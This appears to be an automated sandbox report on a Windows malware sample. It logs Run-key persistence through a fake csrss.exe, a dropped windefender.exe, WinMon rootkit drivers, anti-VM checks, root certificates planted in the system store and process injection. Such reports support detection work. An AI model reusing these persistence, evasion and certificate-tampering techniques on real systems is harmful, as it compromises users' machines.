Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Manipulates WinMon driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMon C:\Windows\rss\csrss.exe N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Logs\CBS\CbsPersist_20240307045316.cab C:\Windows\system32\makecab.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-152 = "Central America Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-11 = "Azores Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-171 = "Central Daylight Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-772 = "Montevideo Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-421 = "Russian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-931 = "Coordinated Universal Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-71 = "Newfoundland Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-421 = "Russian Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-471 = "Ekaterinburg Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-831 = "SA Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-402 = "Arabic Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-241 = "Samoa Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-422 = "Russian Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-384 = "Namibia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-552 = "North Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-72 = "Newfoundland Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-452 = "Caucasus Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-472 = "Ekaterinburg Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-501 = "Nepal Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-931 = "Coordinated Universal Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-672 = "AUS Eastern Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-291 = "Central European Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-842 = "Argentina Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace\Session C:\Windows\system32\netsh.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-334 = "Jordan Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-911 = "Mauritius Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-551 = "North Asia Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-142 = "Canada Central Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-91 = "Pacific SA Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-442 = "Arabian Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-11 = "Azores Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time" C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-652 = "AUS Central Standard Time" C:\Windows\windefender.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob data omitted] C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = [blob data omitted] C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2604 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\system32\cmd.exe
PID 2604 wrote to memory of 2356 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\system32\cmd.exe
PID 2356 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2356 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2356 wrote to memory of 2612 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2604 wrote to memory of 2456 N/A C:\Users\Admin\AppData\Local\Temp\57c1424b08b502eeef5ef902e08397c7a37f0248cc1b4f1043db820ab77ac54f.exe C:\Windows\rss\csrss.exe
